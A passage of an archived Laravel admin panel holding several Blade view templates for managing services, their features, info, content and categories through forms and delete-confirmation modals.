aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive nowrap w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.title') }}</th> <th>{{ __('content.description') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($service_features); $asc=0; @endphp @foreach ($service_features as $service_feature) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $service_feature->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $service_feature->title }}</td> <td>{{ $service_feature->description }}</td> <td>{{ $service_feature->order }}</td> <td> <div> <a href="{{ url('admin/service-feature/'. $id.'/'.$service_feature->id. '/edit') }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModel{{ $service_feature->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModel{{ $service_feature->id }}" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('service-feature.destroy', $service_feature->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="serviceFeatureSectionModal" tabindex="-1" role="dialog" aria-labelledby="serviceFeatureSectionModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="serviceFeatureSectionModalLabel">{{ __('content.section_title_and_description') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if (isset($service_feature_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('service-feature-section.update', $service_feature_section->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="service_id" type="hidden" value="{{ $id }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $service_feature_section->title }}"> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-sm btn-primary" data-toggle="modal" data-target="#serviceFeatureSectionDestroyModal{{ $service_feature_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </form> <!-- Modal --> <div class="modal fade" id="serviceFeatureSectionDestroyModal{{ $service_feature_section->id }}" tabindex="-1" role="dialog" aria-labelledby="serviceFeatureSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="serviceFeatureSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('service-feature-section.destroy', $service_feature_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('service-feature-section.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="service_id" type="hidden" value="{{ $id }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> @endif </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> <div class="modal fade" id="serviceFeatureModal" tabindex="-1" role="dialog" aria-labelledby="serviceFeatureModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="serviceFeatureModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('service-feature.store', $id) }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="service_id" type="hidden" value="{{ $id }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <input type="text" name="description" class="form-control" id="description"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0" required> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/service/feature/edit.blade.php����������������������������������������������������������0000644�����������������00000005275�14765366572�0014626 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_service_feature') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('service-feature.update', $service_feature->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="service_id" type="hidden" value="{{ $service_id }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $service_feature->title }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <input type="text" name="description" class="form-control" id="description" value="{{ $service_feature->description }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $service_feature->order }}" required> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/service/info/create.blade.php�����������������������������������������������������������0000644�����������������00000036061�14765366572�0014441 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.service_info') }}</h4> @if (isset($service_info)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('service-info.update', $service_info->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="service_id" type="hidden" value="{{ $id }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 800 x 600) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($service_info->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/service/'.$service_info->section_image) }}" alt="image" class="rounded w-25"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($service_info->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $service_info->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="video_type" class="col-form-label">{{ __('content.video_type') }}</label> <select class="form-control" name="video_type" id="video_type"> <option value="youtube" selected>{{ __('content.select_your_option') }} </option> <option value="youtube" {{ $service_info->video_type == 'youtube' ? 'selected' : '' }}>{{ __('content.youtube') }}</option> <option value="other" {{ $service_info->video_type == 'other' ? 'selected' : '' }}>{{ __('content.other') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="video_url">{{ __('content.video_url') }} </label> <input type="text" name="video_url" class="form-control" id="video_url" value="{{ $service_info->video_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input id="title" name="title" type="text" class="form-control" value="{{ $service_info->title }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="general-item-list">{{ __('content.item') }} </label> <input id="general-item-list" name="item" type="text" class="form-control" value="{{ $service_info->item }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#serviceInfoDestroyModal{{ $service_info->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $service_info->id }}" tabindex="-1" role="dialog" aria-labelledby="deleteImageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteImageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('service-info.destroy_image', $service_info->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="serviceInfoDestroyModal{{ $service_info->id }}" tabindex="-1" role="dialog" aria-labelledby="serviceInfoDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="serviceInfoDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('service-info.destroy', $service_info->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('service-info.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="service_id" type="hidden" value="{{ $id }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 800 x 600) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input id="section_image" name="section_image" type="file" class="form-control-file"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="video_type" class="col-form-label">{{ __('content.video_type') }}</label> <select class="form-control" name="video_type" id="video_type"> <option value="youtube" selected>{{ __('content.select_your_option') }} </option> <option value="youtube">{{ __('content.youtube') }}</option> <option value="other">{{ __('content.other') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="video_url">{{ __('content.video_url') }} </label> <input type="text" name="video_url" class="form-control" id="video_url"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input id="title" name="title" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="general-item-list">{{ __('content.item') }} </label> <input id="general-item-list" name="item" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary">{{ __('content.submit') }}</button> </div> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/service/create.blade.php����������������������������������������������������������������0000644�����������������00000022551�14765366572�0013505 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.add_service') }} <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/service-'.$style.'.jpg') }}" alt="draft image"> </div> </h4> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('service.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} <span class="text-red">*</span></label> <input id="title" name="title" type="text" class="form-control" required> </div> </div> <div class="col-md-12"> <div class="form-group form-group-default"> <label for="category">{{ __('content.categories') }} <span class="text-red">*</span></label> <select class="form-control" name="category_id" id="category" required> @foreach($categories as $category) <option value="{{$category->id}}">{{$category->category_name}}</option> @endforeach </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="short_description">{{ __('content.short_description') }}</label> <textarea id="short_description" name="short_description" class="form-control" rows="3"></textarea> </div> </div> <div class="col-md-12"> <fieldset class="form-group"> <legend class="font-14">{{ __('content.type') }}</legend> <div class="form-check pl-0 mb-2"> <label class="form-check-label"> <input type="radio" class="form-check-input mr-2" name="type" id="optionsRadios1" onclick="showHideTypeDiv()" value="icon" checked=""><span class="ml-3">{{ __('content.icon') }}</span> <i class="input-helper"></i> </label> </div> <div class="form-check pl-0"> <label class="form-check-label"> <input type="radio" class="form-check-input mr-1" name="type" id="optionsRadios2" onclick="showHideTypeDiv()" value="image"><span class="ml-3">{{ __('content.image') }}</span> <i class="input-helper"></i></label> </div> </fieldset> <div class="form-group" id="icon-type"> <label for="icon" class="d-block">{{ __('content.icon') }}</label> <div class="btn-group"> <input type="hidden" name="icon" class="form-control" id="icon"> <button type="button" class="btn btn-primary iconpicker-component"><i id="icon-value" class="iconpicker-component"></i></button> <button type="button" id="iconPickerBtn" class="icp icp-dd btn btn-primary dropdown-toggle iconpicker-component" data-selected="fa-car" data-toggle="dropdown"> <span class="caret"></span> </button> <div class="dropdown-menu"></div> </div> </div> <div id="image-type" style="display: none;"> <div class="form-group" > <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 64 x 64 (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_image_2">{{ __('content.thumbnail') }} ({{ __('content.size') }} 600 x 600) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input id="section_image_2" name="section_image_2" type="file" class="form-control-file"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }} </label> <input id="button_name" name="button_name" type="text" class="form-control"> <small class="form-text text-muted">{{ __('content.when_you_leave_this_section_blank_it_will_go_to_its_own_detail_page') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }} </label> <input id="button_url" name="button_url" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published">{{ __('content.published') }}</option> <option value="draft">{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary">{{ __('content.submit') }}</button> </div> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection �������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/service/content/create.blade.php��������������������������������������������������������0000644�����������������00000065444�14765366573�0015170 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.service_content') }}</h4> @if (isset($service_content)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('service-content.update', $service_content->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="service_id" type="hidden" value="{{ $id }}"> <div class="row"> <div class="col-md-8"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="summernote">{{ __('content.description') }}</label> <textarea type="text" name="description" class="form-control" id="summernote">@php echo html_entity_decode($service_content->description); @endphp</textarea> </div> </div> <div class="col-md-12 box-margin"> <div id="accordion-"> <div class="card mb-2"> <div class="card-header bg-secondary"> <a class="collapsed text-white" data-toggle="collapse" href="#accordion-1" aria-expanded="false"> {{ __('content.seo_optimization') }} </a> </div> <div id="accordion-1" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="meta_description">{{ __('content.meta_description') }} </label> <input id="meta_description" name="meta_description" type="text" class="form-control" value="{{ $service_content->meta_description }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="meta_keyword">{{ __('content.meta_keyword') }} ({{ __('content.separate_with_commas') }})</label> <textarea id="meta_keyword" name="meta_keyword" class="form-control">{{ $service_content->meta_keyword }}</textarea> </div> </div> </div> </div> </div> </div> <div class="card"> <div class="card-header bg-secondary"> <a class="text-white" data-toggle="collapse" href="#accordion-2" aria-expanded="true"> {{ __('content.breadcrumb_customization') }} </a> </div> <div id="accordion-2" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="breadcrumb_status" class="col-form-label">{{ __('content.please_use_recommended_sizes') }}</label> <select name="breadcrumb_status" class="form-control" id="breadcrumb_status"> <option value="no" selected>{{ __('content.select_your_option') }}</option> <option value="yes" {{ $service_content->breadcrumb_status == 'yes' ? 'selected' : '' }}>{{ __('content.yes') }}</option> <option value="no" {{ $service_content->breadcrumb_status == 'no' ? 'selected' : '' }}>{{ __('content.no') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="custom_breadcrumb_image">{{ __('content.custom_breadcrumb_image') }} ({{ __('content.size') }} 1920 x 400) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="custom_breadcrumb_image" class="form-control-file" id="custom_breadcrumb_image"> <small id="custom_breadcrumb_image" class="form-text text-muted">{{ __('content.recommended_size') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($service_content->custom_breadcrumb_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/service/breadcrumb/'.$service_content->custom_breadcrumb_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="col-md-4"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 800 x 600) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($service_content->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/service/'.$service_content->section_image) }}" alt="image" class="rounded w-25"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($service_content->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $service_content->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#serviceContentDestroyModal{{ $service_content->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </div> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $service_content->id }}" tabindex="-1" role="dialog" aria-labelledby="deleteImageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteImageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('service-content.destroy_image', $service_content->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="serviceContentDestroyModal{{ $service_content->id }}" tabindex="-1" role="dialog" aria-labelledby="serviceContentDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="serviceContentDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('service-content.destroy', $service_content->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('service-content.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="service_id" type="hidden" value="{{ $id }}"> <div class="row"> <div class="col-md-8"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="summernote">{{ __('content.description') }}</label> <textarea id="summernote" name="description" class="form-control"></textarea> </div> </div> <div class="col-md-12 box-margin"> <div id="accordion-"> <div class="card mb-2"> <div class="card-header bg-secondary"> <a class="collapsed text-white" data-toggle="collapse" href="#accordion-1" aria-expanded="false"> {{ __('content.seo_optimization') }} </a> </div> <div id="accordion-1" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="meta_description">{{ __('content.meta_description') }} </label> <input id="meta_description" name="meta_description" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="meta_keyword">{{ __('content.meta_keyword') }} ({{ __('content.separate_with_commas') }})</label> <textarea id="meta_keyword" name="meta_keyword" class="form-control"></textarea> </div> </div> </div> </div> </div> </div> <div class="card"> <div class="card-header bg-secondary"> <a class="text-white" data-toggle="collapse" href="#accordion-2" aria-expanded="true"> {{ __('content.breadcrumb_customization') }} </a> </div> <div id="accordion-2" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="breadcrumb_status" class="col-form-label">{{ __('content.use_special_breadcrumb') }}</label> <select name="breadcrumb_status" class="form-control" id="breadcrumb_status"> <option value="no" selected>{{ __('content.select_your_option') }}</option> <option value="yes">{{ __('content.yes') }}</option> <option value="no">{{ __('content.no') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="custom_breadcrumb_image">{{ __('content.custom_breadcrumb_image') }} ({{ __('content.size') }} 1920 x 400) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="custom_breadcrumb_image" class="form-control-file" id="custom_breadcrumb_image"> <small id="custom_breadcrumb_image" class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="col-md-4"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 800 x 600) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input id="section_image" name="section_image" type="file" class="form-control-file"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary col-12">{{ __('content.submit') }}</button> </div> </div> </div> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/service/category/create.blade.php�������������������������������������������������������0000644�����������������00000027244�14765366573�0015327 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.categories') }}</h6> <div> <button type="button" class="btn btn-primary float-right mb-3" data-toggle="modal" data-target="#categoryModal">+ {{ __('content.add_category') }}</button> </div> </div> @if (count($categories) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('service-category.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div 